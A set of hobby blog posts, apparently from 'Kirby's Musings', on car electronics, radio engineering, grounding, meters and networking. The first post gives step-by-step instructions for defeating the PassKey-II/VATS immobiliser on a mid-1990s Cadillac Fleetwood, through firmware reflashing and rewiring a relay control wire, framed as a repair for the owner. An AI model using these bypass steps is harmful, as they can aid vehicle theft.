Disable PassKey-II on Cadillac Fleetwood - Kirby's Musings

I was recently introduced to a 94-96 Cadillac Fleetwood, which had a VATS fault that was aggravating the owner. The owner had previously tried permanently installing resistors under the dash to allow the VATS system to read a correct resistance value, but for some reason that fix was no longer the cure. These are the steps taken to effectively neutralize the VATS/PassKey system on a 1995 Cadillac Fleetwood that was built in 08/1994 but had a 1995 VIN, and OBD-I. 1995 was the changeover year for the Fleetwood (D-body) to go from OBD-I to OBD-II, so depending on when the car was constructed, it may be of either type.

1) Use C.A.T.S. Flash to download the firmware from the car, twice to assure a proper read.
2) Disable VATS functionality from the car firmware.
3) Upload the firmware to the car.
4) Download the firmware from the car again to verify that the VATS function is disabled.

At this point in the process, the Powertrain Control Module (PCM) no longer monitors or acts on the signals from the Central Control Module (CCM) regarding fuel pump enable. Fuel Pump Enable is a "modulated signal wire", so tying the line to +5V or logic ground will not enable the pump. The service manual contains a simulated oscilloscope trace of a 50% duty cycle square wave. I did not take the time to verify the signal since it was outside of the scope of work (narrowly defined as "Bypass this b**** so I can get to work, homie!").

A core feature of the 1994/1995 LT1 corporate motor implementation present in the Chevy Camaro, Caprice, Impala SS, Buick Roadmaster, and Cadillac Fleetwood is that the fuel pump, injectors, and ignition coil are all under the control of the PCM, while the starter motor is controlled by the ignition switch alone. This means that it is possible to continue cranking the engine until the point of battery failure while the PCM has withheld spark, fuel, or both. Diagnosing the system approaches the ritualistic.

1) When the ignition switch is turned to ON, the fuel pump should run for a few seconds. Even if the fuel pump is weak, this is a good sign that fuel is present in the fuel rail and the PCM has an intent to start so far.
2) Battery voltage should remain above 8 V while cranking.
3) The PCM supplies both fuel (via injectors) and spark.
4) The spark plug gap is 0.050", and the ignition coil can deliver a healthy spark into almost anything -- including you. Use caution in verifying that sparks are being generated. A spare plug wire can connect to the top of the ignition coil and be held above ground to bypass the Optispark distributor.
5) Immediately after a cranking attempt without the engine firing, the odor of gasoline should be noticeable from the exhaust. Please remember not to smoke in an explosive environment such as unburned exhaust fumes.

The Cadillac Fleetwood further confounds this process because of two additional modules present in few cars. One of those modules is the Theft Deterrent Module (TDM), which receives key fob commands and responds, as well as controlling the horn and lights to create the panic alarm. This module is occasionally found in Buick Roadmasters and Chevy Impalas. Despite the name, the TDM has little to do with actually inhibiting the starting of the vehicle. The other module is the Central Control Module (CCM), which implements most of the functionality present in the Fleetwood's environmental, entertainment, and other systems present only in that car and not shared with many other cars of the model year. The CCM implements the actual checking of the PassKey-II resistor, and controls the Theft Deterrent Relay (TDR).

The Theft Deterrent Relay (TDR) is located on the cabin side of the firewall directly in front of the passenger seat under the dash. Gymnastics may be required to reach this area, so the TDR was left in factory configuration. The TDR is effectively in series with the starter solenoid, but only receives power when the ignition switch is set to START. The control wire for the TDR is Yellow/Black in the 1995 model year, and this wire color is present in the trunk at the CCM.

The Central Control Module (CCM) mounts vertically behind the middle of the backseat and has two connectors along the driver's side: C1 (upper), and C2 (lower). The wire that controls the TDR connects to position D13 of C2. D13 appears to be on the bottom of the connector, if the clamp is located on the top of the connector. The following should be observed as a guide:

D13: Yellow-Black
D14: Light Green
D16: Dark Green-White

Wire D13 can be cut and spliced to a wire connecting to a nearby bolt or self-tapping metal screw and star washer to the body of the car, which completes the ground circuit. This disables what little control the PassKey-II System has to prevent the car from cranking. It is worth noting that the PCM has most of the control of the cranking process, and if the TDR were bypassed (such as holding the starter solenoid down with a screwdriver), the car would likely start. A simple way to test if this change worked is to disconnect the CCM entirely, and attempt to start the car. If the starter solenoid or motor engages, the fix is effective. Then the CCM can be reconnected and the interior reinstalled in the trunk. 

Steel Wire Instead - Kirby's Musings

In electrical applications, it's not unusual to spend a large amount of money acquiring and installing copper wire, or when that is too expensive, changing to a larger gauge or two and using aluminum wire. Sometimes the cost of aluminum wire is still significant, or there are special needs or reasons as to why steel wire may be favored, such as long spans. Long spans of unsupported wire are often seen in antenna applications as well as power distribution. These spans are typically above 125 feet in height, which is roughly the limit for timber which supplies wooden poles used to support such wires from the ground without impacting the antenna pattern.

From a historical text (free on Google Books, so likely well before 1950):

Example: A cable 3/8-inch in diameter, made of 7 strands of high strength crucible steel, weighs approximately 295 lbs. per 1000 ft. and breaks under a load of 11,500 lbs. Calculate the actual cross sectional area from the fact that steel weighs 490 lbs. per cubic foot; then find the resistance per mile, the ohms per circular mil foot being 115. The volume of 1000 ft. = 295/490 = 0.602 cu. ft., hence the cross section = 0.602/1000 = 0.000602 sq. ft. This equals 0.000602 x 144 or 0.0867 sq. in., which equals 86,700 sq. mils and 86,700 / 0.785, or 110,300 C. M. Resistance per mile = 115 x 5,280/110,300 = 5.5 ohms.

(Journal of Electricity, Jan 1, 1921, p. 30.) https://books.google.com/books?id=-uZBAQAAMAAJ&pg=PA30&lpg=PA30#v=onepage&q&f=false

3/8" is between 00 and 000 gauge, so one can see that this is still a large wire for any application used, and being larger than #6, satisfies NEC requirements for power distribution wire sizes.

#6: 0.162" or 13.3 mm diameter for solid rod wire.

Probably just cheaper to buy the cable with the insulation on it, unless it's going outdoors and that's a lot of insulation.

Grounding: Copper Strap vs Structural Steel - Kirby's Musings

In broadcast, multi-tenant, and microwave shelter design, it is desirable to prevent lightning from impacting operations. One way of doing this is by constructing a "halo" around the inside of the building at roof, wall, and/or floor level, or around the outside of the shelter or entire equipment installation.

The fundamental nature of lightning is that of an effective DC pulse channeled through a single point of contact. Because lightning is essentially a large DC pulse like a square wave with a trailing edge, low-frequency AC pulses are induced in nearby wires and radiated when lightning strikes. This is what produces the characteristic "slope" on a spectrum analyzer of a lightning strike.

Since lightning is a static charge equalizing through a single point, it is easy to see that equalization over an area is the desired result of the strike. A tree gets blown to smithereens, but the charge dissipates and equalizes over the area around the strike -- both above and below the point of contact. Using good conductors, the magnitude of voltage across a given area is minimized. This lowered difference in potential prevents large voltages from appearing across equipment.

By running ground strap across the inside walls of the shelter around the perimeter at the ceiling, middle of wall, and floor levels, the lightning is given a path around the equipment instead of through the equipment. This prevents damage as high-resistance points in the equipment won't result in arc flashover due to high voltage across those points. This is not a Faraday cage, but works in a similar fashion. By giving lightning an alternative path of low resistance and impedance, the vast majority of the current goes around rather than through.

NEC compliance confuses this point, because traditional RF grounding for lightning and power grounding are somewhat at odds. Military manuals and Motorola's guide to R25 installation help. In some cases, the halo ground system has been implemented with the power ground opposite the tower coax window / ground panel. This allows NEC compliance with respect to the power ground, while putting a ground rod at the tower base and connecting the two together via 0000 to 2 AWG copper conductors.

At this point, we will discuss the merits of a copper ground halo above equipment versus using building steel and steel bolts.

A 4" copper ground strap 0.022" thick has a total cross section of 0.088 square inches, equating to a little larger than the cross-section of 0 AWG copper wire. 0 AWG copper wire has a resistance of 0.1 ohms per 1,000 ft. Thus, 1,000 feet of 4" 0.022" thick copper strap has a resistance of nearly 0.1 ohms.

A carbon steel wire 0.5" in diameter has a resistance of 0.00034 ohms per foot, or roughly .34 ohms per 1,000 ft. Thus, three 1/2" diameter bolts are nearly equal to 4" 0.022" thick copper strap assuming no other losses.

This calculation does not factor in the resistance of zinc at steel-zinc-zinc-steel junctions. However, one can see that with steel-on-steel contact under pressure, three or more (typically six) bolts are enough to allow the building steel to act as a halo, thus not requiring that a copper halo be installed as long as the building steel is attached to the ground system.

1" diameter carbon steel has a resistance of 9.0 x 10^-5 ohms per foot or .09 ohms per 1kft, so one can see why big towers often are not connected together with ground straps from section to section but smaller towers are.
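As an added worked example (mine, not from the post or the 1921 text), the calculations in the steel-wire post above and in this grounding comparison carried out in Python: the cable cross-section is backed out of its weight exactly as the Journal of Electricity example does, and the strap and bolt figures use the page's own numbers. The copper resistivity of 10.37 ohm-cmil/ft is a handbook value I supply; it is not on the page.

```python
import math

# Resistivity in ohm-circular-mil per foot. 115 is the figure the 1921 text uses for
# high-strength crucible steel cable; 10.37 is the usual handbook value for annealed
# copper at 20 C (my assumption, not from the post).
OHM_CMIL_FT_STEEL_CABLE = 115.0
OHM_CMIL_FT_COPPER = 10.37

STEEL_DENSITY_LB_PER_CUFT = 490.0
SQ_MIL_PER_CMIL = math.pi / 4.0     # the 1921 text rounds this to 0.785


def circular_mils_from_sq_in(area_sq_in):
    """Square inches -> square mils -> circular mils."""
    return area_sq_in * 1_000_000 / SQ_MIL_PER_CMIL


def circular_mils_from_weight(lb_per_1000ft, density_lb_per_cuft=STEEL_DENSITY_LB_PER_CUFT):
    """Back out a cable's conducting cross-section from its weight, as the 1921 example does."""
    volume_cuft = lb_per_1000ft / density_lb_per_cuft   # volume of 1000 ft of cable
    area_sq_ft = volume_cuft / 1000.0                    # cross-section in square feet
    return circular_mils_from_sq_in(area_sq_ft * 144.0)


def resistance_ohms(length_ft, cmils, ohm_cmil_ft):
    """R = rho * L / A with rho in ohm-cmil/ft, L in feet, A in circular mils."""
    return ohm_cmil_ft * length_ft / cmils


def parallel(*resistances):
    """Equivalent resistance of conductors in parallel (several bolts through one joint)."""
    return 1.0 / sum(1.0 / r for r in resistances)


def steel_cable_ohms_per_mile(lb_per_1000ft=295.0):
    """The 3/8" seven-strand cable: the text arrives at 5.5 ohms per mile."""
    cmils = circular_mils_from_weight(lb_per_1000ft)
    return resistance_ohms(5280.0, cmils, OHM_CMIL_FT_STEEL_CABLE)


def copper_strap_ohms_per_1000ft(width_in=4.0, thickness_in=0.022):
    """4" x 0.022" strap: 0.088 sq in of copper, a little more than 0 AWG."""
    cmils = circular_mils_from_sq_in(width_in * thickness_in)
    return resistance_ohms(1000.0, cmils, OHM_CMIL_FT_COPPER)


def bolted_steel_ohms_per_1000ft(bolt_count=3, ohms_per_ft_each=0.00034):
    """Bolts in parallel, using the post's 0.00034 ohm/ft for 1/2" carbon steel."""
    return parallel(*([ohms_per_ft_each * 1000.0] * bolt_count))


if __name__ == "__main__":
    print(f"steel cable: {steel_cable_ohms_per_mile():.2f} ohm/mile")
    print(f"copper strap: {copper_strap_ohms_per_1000ft():.3f} ohm/1000 ft")
    print(f"three 1/2in bolts: {bolted_steel_ohms_per_1000ft():.3f} ohm/1000 ft")
```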

It would be preferable to have the building steel sections welded together, or jumpers cadwelded around each joint.

Bell Microwave Radio Reference - Kirby's Musings

This is an attempt at an exhaustive list of Bell System Technical Journal articles on Long Lines microwave technologies.

Published February 4, 1948
First introduction of the horn antenna and add/drop RF hybrid duplexer

BSTJ 30: 4. October 1951: The TD-2 Microwave Radio Relay System. (Roetken, A.A.; Smith, K.D.; Friis, R.W.)

BSTJ : The TJ Radio Relay System (Gammie, J.; Hathaway, S.D.)

Published July 4, 1960


BSTJ 39: 2. March 1960: Radio Frequency Interference Considerations in the TD-2 Radio Relay System. (Curtis, H.E.)

Published March 1960

BSTJ 62: 10. December 1983: The AR6A Single-Sideband Microwave Radio System: The Traveling-Wave-Tube Amplifier. (Balicki, J.F.; Cook, E.F.; Heidt, R.C.; Rutter, V.E.)


BSTJ 62: 1. January 1983: Maximum-Power and Amplitude-Equalizing Algorithms for Phase Control in Space Diversity Combining. (Karabinis, P.D.) Published January 1983

BSTJ 54: 1. January 1975: Space-Diversity Engineering. (Vigants, A.)

Published January 1975

BSTJ 44: 7. September 1965: The Triply-Folded Horn Reflector: A Compact Ground Station Antenna Design for Satellite Communications. (Giger, A.J.; Turrin, R.H.)

Published September 1965

German microwave horn is based on this design. Musselhorn


BSTJ 42: 4. July 1963: The Autotrack System. (Cook, J.S.; Lowell, R.)

Published July 1963
Holmdel Horn tracker

BSTJ 42: 4. July 1963: The Servo System for Antenna Positioning. (Lozier, J.C.; Norton, J.A.; Iwama, M.)

Published July 1963

BSTJ 42: 4. July 1963: The Precision Tracker. (Anders, J.V.; Higgins, E.F. Jr.; Murray, J.L.; Schaefer, F.J. Jr.)

Published July 1963


BSTJ 42: 4. July 1963: Digital Equipment for the Antenna Pointing System. (Githens, J.A.; Peters, T.R.)

Published July 1963


BSTJ 38: 1. January 1959: Radio Transmission into Buildings at 35 and 150 mc. (Rice, L.P.)

Published January 1959


Published November 1952


BSTJ 38: 1. January 1959: Radio Attenuation at 11 kmc and Some Implications Affecting Relay System Engineering. (Hathaway, S.D.; Evans, H.W.)

Published January 1959

BSTJ 36: 3. May 1957: Interchannel Interference Due to Klystron Pulling. (Curtis, H.E.; Rice, S.O.)

Published May 1957

BSTJ 36: 2. March 1957: An Experimental Dual Polarization Antenna Feed for Three Radio Relay Bands. (Dawson, R.W.)

Published March 1957

BSTJ 47: 7. September 1968: Microwave Radio Equipment and Building Considerations. (Skrabal, R.J.; Word, J.A.)

Published September 1968

BSTJ 38: 5. September 1959: A Network for Combining Radio Systems at 4, 6 and 11 kmc. (Harkless, Earl T.)

Published September 1959


Published November 1

BSTJ 50: 6. July-August 1971: Antenna Spacing Requirement for a Mobile Radio Base-Station Diversity. (Lee, W.C.Y. )

Published July 8, 1

BSTJ 60: 6. July-August 1981: Microwave Radio Obstruction Fading. (Vigants, A.)

Published July 8, 1

BSTJ 59: 8. Oct 1980: Horn-Reflector Antenna - Eliminating Weather-Cover Reflections. (Semplak, R.A.)

Published October 1980

BSTJ 60: 8. October 1981: A New Approach to High-Capacity Digital Mobile Radio. (Henry, P.S.; Glance, B.S.)

Published October 1


BSTJ 45: 1. January 1966: The TM-1 / TL-2 Short Haul Microwave Systems. (Friis, R.W.; Jansen, J.J.; Jensen, R.M.; King, H.T.)

Published January 1966


BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Microwave Transmitter and Receiver . (Hamori, A.; Jensen, R.M.)

Published September 1


BSTJ 62: 10. December 1983: The AR6A Single-Sideband Microwave Radio System: Radio Transmitter-Receiver Units. (Heidt, R.C.; Cook, E.F.; Hecken, R.P.; Judkins, R.W.; Kiker, J.M. Jr.; Provenzano, F.J. Jr.; Wang, H.C.)

Published December 1983

BSTJ 37: 4. July 1958: Amplitude Modulation Suppression in FM Systems. (Ruthroff, C.L.)

Published July 1958

BSTJ 40: 1. January 1961: Mode-Conversion Filters. (Marcatili, E.A.)

Published January 1

BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Networks . (Drazy, E.J.; Sheehey, R.E.; Wang, H.C.)

Published September 1

BSTJ 47: 1. January 1968: An Improved Design of Waveguide Band-Rejection Filters. (Wang, H.C.)

Published January 1968

BSTJ 48: 2. February 1969: The Application of Delta Modulation to Analog-to-PCM Encoding. (Goodman, David J.)

Published February 1969


BSTJ 46: 1. January 1967: A High-Quality Waveguide Directional Filter. (Abele, T.A.)

Published January 1967

BSTJ 42: 5. September 1963: The TL Radio Relay System. (Hathaway, S.D.; Sagaser, D.D.; Word, J.A.)

Published September 1963


BSTJ 52: 5. May-June 1973: Computing Distortion in Analog FM Communication Systems. (Rainal, A.J.)

Published May 6, 1973


BSTJ 42: 4. July 1963: The Spacecraft Communications Repeater. (Davis, C.G.; Hutchison, P.T.; Witt, F.J.; Maunsell, H.I.)

Published July 1963


BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Modulators . (Giust, O.)

Published September 1

BSTJ 61: 8. October 1982: Error Probability of Partial-Response Continuous-Phase Modulation with Coherent MSK-Type Receiver, Diversity, and Slow Rayleigh Fading in Gaussian Noise. (Sundberg, C.E.)

Published October 1982

BSTJ 40: 1. January 1961: Band-Splitting Filter. (Marcatili, E.A.; Bisbee, D.L.)

Published January 1

BSTJ 44: 4. April 1965: Index Reduction of FM Waves by Feedback and Power-Law Nonlinearities. (Benes, V.E.)

Published April 1965

BSTJ 50: 7. September 1971: TH-3 Microwave Radio System: Microwave Generator . (Bedell, H.R.; Judkins, R.W.; Lahlum, R.L.)

Published September 1

100 KHz Data Channels - Kirby's Musings

In amateur radio we have 100 kHz wide data channels at a maximum of 19.2 kbaud (not kbit; kbaud indicates a symbol rate, not the actual data transferred or the binary serial data rate) at 222 MHz and above. However, very few radios actually support this data mode.

One approach to solve this problem is by using frequency-division multiplexing and inverse multiplexing. Inverse multiplexing separates a single high-speed serial data stream into a specific sequence of several slower serial data flows which pass over multiple data links of some form and are resequenced and combined at the opposite end of the link back into a high-speed data stream.

Using frequency-division multiplexing allows multiple voice channels to share a common group channel as if they were added up on the frequency axis. Six 300 - 4,000 Hz voice channels are stacked to create a 300 Hz - 24 kHz baseband voice group. That group, when applied to an FM modulator with a modulation index of 1, results in an occupied bandwidth of approximately 100 kHz as calculated by Carson's Rule (24 kHz + 24 kHz = 48 kHz; 48 kHz * 2 = 96 kHz). (FCC Part 97 states that the modulation index may not be greater than one.)

By splitting the resistive hybrid combiners from an external V.90 or V.92 modem (33.6 K or 56 K), the modem can be duplexed to use a four-wire interface with a separate TX and RX audio pair instead of a two-wire interface with both RX and TX combined. By capturing the independent audio streams using sound cards or DSP, the streams can be combined with simple processing. The incoming audio is captured at 8,000 samples per second with an 8-bit sample depth. The audio is mixed / stacked / combined using simple processor math or DSP, resulting in an audio stream that extends from 300 Hz to 24 kHz. This is within the capabilities of 48 kHz or 96 kHz sound cards, and there are USB varieties of each today. The resulting combined audio stream is applied directly to the modulator of a radio, creating the 100 kHz wide modulated signal. To receive the signal, one need only remove the IF filters from the FM radio and replace the 20 kHz filters with 100 kHz filters. The modulator may require specific modifications; some PLL loops operate at 50 kHz and may be incapable of handling the broad bandwidth.

The reason why 0-300 Hz is not used is to prevent issues with DC coupling in the modulator or demodulator. This also allows for introducing a low-frequency signaling component or clock synchronization carrier without introducing large amounts of AM, FM, and/or PM interference of any combination thereof.

The V.90 modem has a carrier frequency of 3429 Hz and runs at QAM256, encoding eight bits of information per resulting symbol. The V.90 and V.92 modem cores do not exist in an open-source format and contain related patents. Therefore, this is a circumstance where the modem function is effectively offloaded to dedicated hardware.

Combining the data flows from the six modems requires a form of inverse multiplexing. Rather than re-engineer and re-implement this in a format specific to this application, one may use Multilink PPP to manage the modems and modem connectivity as well as perform frame disassembly and assembly.

Since digital switching is not involved, it is not possible to achieve 56 K or 64 K data rates. Instead, the maximum analog rate is the limit at 33.6 kbit/s per modem. This aggregates to 201.6 kbit/s, with one byte per modem being sent per symbol transmitted, (i.e.: 3429 * 6 = 20574 but the actual baud rate is 3429 Hz). Six bytes are transmitted per symbol time aggregated across all modems.
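An added illustration (mine, not the post's) of the inverse-multiplexing step described above: one byte per modem per symbol time is striped across six flows with Multilink-PPP-style sequence numbers, and the far end reassembles them in whatever order the links deliver, flagging the bytes lost if a modem drops. The Carson's-rule and aggregate-rate helpers use the 24 kHz and 33.6 kbit/s figures from the post.

```python
from collections import defaultdict

LINKS = 6                 # one modem per voice slot in the six-channel FDM group
SYMBOL_RATE = 3429        # symbols per second per modem, as stated in the post
BYTES_PER_SYMBOL = 1      # QAM256 carries eight bits per symbol per modem


def carson_bandwidth_hz(peak_deviation_hz, highest_baseband_hz):
    """Carson's rule: occupied bandwidth = 2 * (peak deviation + highest modulating frequency)."""
    return 2 * (peak_deviation_hz + highest_baseband_hz)


def bytes_per_symbol_time():
    """Payload moved across all links during one symbol period."""
    return LINKS * BYTES_PER_SYMBOL


def aggregate_bit_rate(per_modem_bps=33_600):
    """Six analog modems in parallel; 33.6 kbit/s is the analog ceiling per modem."""
    return LINKS * per_modem_bps


def inverse_mux(payload):
    """Stripe a byte stream over LINKS slower flows: byte k rides link k % LINKS.
    Every fragment carries its sequence number, as Multilink PPP fragments do, so the
    far end can restore the original order. Returns {link: [(seq, byte), ...]}."""
    flows = defaultdict(list)
    for seq, byte in enumerate(payload):
        flows[seq % LINKS].append((seq, byte))
    return dict(flows)


def inverse_demux(fragments, expected_len):
    """Reassemble fragments that may arrive from the links in any order.
    Returns (recovered_bytes, missing_sequence_numbers); a regular pattern of gaps
    points at one dead link rather than random corruption."""
    slots = [None] * expected_len
    for seq, byte in fragments:
        if 0 <= seq < expected_len:
            slots[seq] = byte
    missing = [i for i, b in enumerate(slots) if b is None]
    return bytes(b for b in slots if b is not None), missing


if __name__ == "__main__":
    # Constructed sample payload; links are drained in a scrambled order to show resequencing.
    data = b"The quick brown fox jumps over"
    flows = inverse_mux(data)
    arrived = [frag for link in (5, 3, 0, 4, 2, 1) for frag in flows[link]]
    print(inverse_demux(arrived, len(data)))
    print(carson_bandwidth_hz(24_000, 24_000), "Hz occupied;", aggregate_bit_rate(), "bit/s aggregate")
```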

If one transmitter is located at 420.050 and another further up the band at 446.550 MHz, then duplexing may be possible without using cavity filters.

Why Analog Meters? - Kirby's Musings

Why should I use analog meters?

  • Require no batteries
  • Can be left in circuit at all times
  • Instant or continuous reading/observation
  • Range can be set by configuration/specification/design

Analog meters may be used for a number of applications for measuring volts, amps, watts, ohms, etc. The biggest advantage is that one need not replace batteries to continue to observe electrical conditions.


In the case of voltmeters, one can protect the meter by using zener diodes. The range in a voltmeter is set by the coil resistance, as well as the multiplier or ballast resistor.

For ammeters, a pair of Schottky diodes wired back to back will protect the meter movement from large swings, with the hazard being that a 50 or 75 mV Full-Scale Deflection (FSD) meter movement may experience 300-400 mV as the diode starts to conduct, effectively acting like a zener diode.

  • Caveat: Ammeter shunts must be designed or rated for continuous-duty use to remain in circuit all the time.

A standard shunt is only designed for 66% of the continuous-duty power dissipation requirements. To maintain the resistance rating, a larger shunt must be used that provides the same resistance over the desired range. One may calculate the range by comparing 50 mV shunts to 75 mV shunts and lining up the resistance to power ratings.

50 mV is 66% of 75 mV; a 75 A 75 mV shunt produces 50 mV at 66% of the rated current (75 A x 66% = 49.5 A). Thus, a 75 A 75 mV intermittent-duty shunt is also a 50 A 50 mV continuous-duty shunt (plus or minus a few percent).

To protect either in the case or situation of induced RF, liberal use of Schottky diodes and/or 10 - 1000 nF (0.01 uF, 0.1 uF, and 1 uF) capacitors will effectively short out the AC component.

A secondary caveat to using analog meters is that they are not known for accuracy; common meters were +/- 3% accurate, while high-accuracy meters were often +/- 1% accurate. Digital meters are far more accurate, but with accuracy come costs, and external power requirements.

IP Allocation Plan for AMPRNet Alabama - Kirby's Musings

This is my plan for IP Allocation in for the Alabama section of AMPRNet:

V1.0:
- /21: Backbone networking projects (statewide infrastructure, servers, DNS, DHCP, WWW, etc.)
- 2x /24: /30s and /31s for fixed links on an individual coordination basis.
- KK5VD (/28 actual for four links)
- KK5VD
- KK5VD
- KK5VD
- unallocated
- individual allocations as necessary (/24s, etc. start here) Allocated N4BWP Allocated Madison County Area.
- /18: Statewide Mesh, OSLR, etc. Individual IPs defined per hostname or IP or request. Netmask:

V2.0: backbone services space
44.100.1-67/24: one /24 per county.
44.100.68-96: additional networks as needed, such as metro-area links
44.100.97-127: filled from the highest to lowest for point-to-point links, i.e.:
44.100.192-223/19: Mesh space - may be expanded to 44.100.128 and/or 44.100.255.

All of this keeps in mind that RF doesn't respect county boundaries, and there may be more than 252 people using IP in a given county.
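Added example, not part of the original plan: the V2.0 layout expressed with Python's ipaddress module, with an overlap check across the county, metro, point-to-point and mesh blocks, and an allocator that hands out /30 and /31 link networks from the top of 44.100.97-127 downward. The 67 county /24s and the block boundaries come from the plan; treating "filled from the highest to lowest" as a top-down, non-overlapping allocator is my reading of it.

```python
import ipaddress
from ipaddress import IPv4Network

# Statewide block the plan carves up; 67 county /24s matches Alabama's county count.
STATE = IPv4Network("44.100.0.0/16")


def county_networks():
    """One /24 per county: 44.100.1.0/24 through 44.100.67.0/24."""
    return {n: IPv4Network(f"44.100.{n}.0/24") for n in range(1, 68)}


def range_blocks(first_third_octet, last_third_octet):
    """Smallest set of CIDR blocks covering 44.100.<first>.0 through 44.100.<last>.255."""
    lo = ipaddress.IPv4Address(f"44.100.{first_third_octet}.0")
    hi = ipaddress.IPv4Address(f"44.100.{last_third_octet}.255")
    return list(ipaddress.summarize_address_range(lo, hi))


METRO = range_blocks(68, 96)      # additional networks as needed, e.g. metro-area links
PTP_POOL = range_blocks(97, 127)  # point-to-point links, filled from the highest address down
MESH = [IPv4Network("44.100.192.0/19")]


class PointToPointAllocator:
    """Hands out /30 or /31 link networks from the top of the pool downward, never
    overlapping an earlier allocation (my interpretation of the plan's wording)."""

    def __init__(self, pool):
        self.pool = pool
        self.allocated = []

    def allocate(self, prefixlen):
        if prefixlen not in (30, 31):
            raise ValueError("fixed links are /30 or /31")
        # Highest pool block first, and within it the highest candidate subnet first.
        for block in sorted(self.pool, key=lambda b: b.network_address, reverse=True):
            for candidate in reversed(list(block.subnets(new_prefix=prefixlen))):
                if not any(candidate.overlaps(a) for a in self.allocated):
                    self.allocated.append(candidate)
                    return candidate
        raise RuntimeError("point-to-point pool exhausted")


def plan_blocks():
    return list(county_networks().values()) + METRO + PTP_POOL + MESH


def plan_is_consistent(extra_cidrs=()):
    """True when every block (plus any proposed extra CIDR strings) lies inside the state
    /16 and no two blocks overlap; use it to vet an addition before handing it out."""
    blocks = plan_blocks() + [IPv4Network(c) for c in extra_cidrs]
    if not all(b.subnet_of(STATE) for b in blocks):
        return False
    return not any(a.overlaps(b) for i, a in enumerate(blocks) for b in blocks[i + 1:])


if __name__ == "__main__":
    print("plan consistent:", plan_is_consistent())
    alloc = PointToPointAllocator(PTP_POOL)
    for plen in (30, 31, 30):
        print(f"/{plen} link ->", alloc.allocate(plen))
```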

Disable Auto-Play On Import in iTunes - Kirby's Musings

From the "Who thought this was a good idea?" Dept.:

How to disable auto-play on import in iTunes:

Open a Terminal.App window and paste this in:

defaults write com.apple.iTunes play-songs-while-importing -bool FALSE

That's all.

AM Transmitter Efficiency Improvement - Kirby's Musings

A carrier control system is sweeping AM radio stations now as AM stations rush to save power. Craig Kopcho says this of his experience:

This is a power saving gizmo that I installed in WOKV's night-time transmitter. It is set for a minus 3 dB dip in carrier and modulation power during periods of peak modulation. You can actually see the power drop with modulation. Now this goes against everything that I have been taught but I notice no degradation in coverage or loudness with the carrier control system working. The advantage of doing this is an overall reduction in power consumption. Again I have been where the signal is almost non-existing and remotely switched this system on and off and I cannot hear the difference. It should be noted that we have been granted permission from the FCC to not conform to traditional carrier shift requirements. The video was shot with the transmitter looking into the dummy load. https://www.youtube.com/watch?v=FARdE7_8bQM
Tom Ray corrects:

Your paragraph... ...is a little misleading. The power in the sidebands doesn't change from full carrier operation - so the modulation power is the same. It's the carrier that drops. And, be honest. When you put it on the air, and first saw the common point meter drop, you thought you had to fix something. That was my reaction.

"Everything old is new again," except there is nothing new here, save for the implementation. The technique originates in AM-compatible SSB and/or DSB with a suppressed carrier (DSB-SC). Dynamic Carrier Control has been around for a while, but real-time conversion from pure AM (even with DCC enabled) to DSB-SC is resulting in lowered power bills significantly (Tom Ray reported consistently measuring a 34% reduction in power consumption with a Harris 3DX50 transmitter, equating to about 23% savings for the entire site after including HVAC savings).

The short explanation of this phenomenon is that the carrier itself is being amplitude modulated prior to mixing or modulation when modulation is maximized. In this way, the implementation is more like AM times AM, or AM squared. It effectively behaves as if one placed a variable attenuator in the RF line and turned down the RF drive level as the modulation level approached maximum modulation. The drive level is returned to normal as the transmitter recovers from the modulation peak.

Historical AM transmitters, like WLW's 500 kW station, require large amounts of power to modulate the plate supply. The modulation power at audio frequencies is fed into a transformer installed between the DC power supply and the RF amplifier tubes, and the resulting added or subtracted power effectively turns the carrier on and off on a continuously variable basis up to the limits of transformer core saturation, producing the modulation sidebands around the carrier as the constant carrier is modulated in amplitude by the combination of the two powers. As the transformer approaches saturation, it acts like a reactor or a variable choke, limiting the transfer of power to the final amplifier. This is how 90-100% modulation is achieved: by pinching off the RF PA's power supply. Old fashioned, but it works.

The above technique is being rediscovered as the Class G amplifier, where the power supply bus rails and transistor biases are switched from several operating voltages, i.e.: -50, -25, -15, -7, -3.5 V and 3.5, 7, 15, 25, 50 V. The amplifier is kept operating as a Class-C amplifier at the different power levels and switched to the next range as more power is needed. Basically, a 150 W transistor (i.e.: 2N3055) is being used as a 100 mW (2N2222 or 2N3904 for the new kids), 1 W, 5 W, or 25W transistor when necessary.  

A two-way FM radio rated for 110W was sometimes rated by the manufacturer for 55W to 110W continuously variable -- that is, the power may be set to any level in that range and left there. The efficiency of the final (Class C) amplifier varies considerably through that range, and at power levels below 80%, may be less efficient than at higher power levels due to the fixed transistor bias levels. Those fixed bias levels cause the transistor to conduct longer at lower power levels, effectively reducing the "pulse like" behavior of a Class C amplifier -- conducting less than 50% of the time, approximately 120 degrees of the 360 degrees in a sine wave (33%) --  into a Class B amplifier, conducting 180 or less degrees (50%) and if bias is set high enough, into a Class AB amplifier, conducting 360 to 180 degrees of the cycle. Here I express conduction angle backwards, since we are moving from more efficient to less efficient as transistor bias voltage goes up and the transistor conducts more and more of the time it takes the sine wave to go through the cycle. That conduction time is being expressed in degrees of a 360 degree circle -- a sine wave may also be expressed as a circle, but that's calculus, vectors, and a whole lot of math.

What DSB-SC is doing is amplitude modulating the RF carrier drive to the final amplifier so that as peak modulation is approached, the RF drive is minimized. The resulting total peak power demand on the final amplifier goes down but the effective signal does not because the carrier is suppressed, reducing the amount of power required to amplify the combined lower and upper sidebands and the carrier.

From http://www.w8ji.com/amplitude_modulation.htm:

(If) Unmodulated carrier = 100 watts (PEP or) average carrier power.

Average is the same as PEP because, absent amplitude modulation, the carrier level is unchanging over time.

100% steady modulated 100 w carrier = 400 watts PEP or 150 watts average or "heating" power. Of this 150 watts average or "heating" power, 100 watts is in the carrier, and 25 watts average power is in each of the two AM signal's sidebands.

Carrier average power = 2/3 of the total 100% modulated average power

Total of both sidebands, average power = 1/3 of total average power under 100% modulation

Average power one sideband = 1/6th average power with 100% modulation

Peak Envelope Power 100% symmetrical modulation = Four times carrier power

As the carrier power is dynamically adjusted lower as modulation power increases, the total power required flattens out, allowing an amplifier of a given size to produce a signal as effectively as a conventional "pure AM" transmitter. One would think the CB radio guys would have figured this out a decade or two ago to get "more power" from a 4 W AM or 12 W SSB radio. With DSB-SC, one would find the power level somewhere between those two numbers, but that's another story entirely.
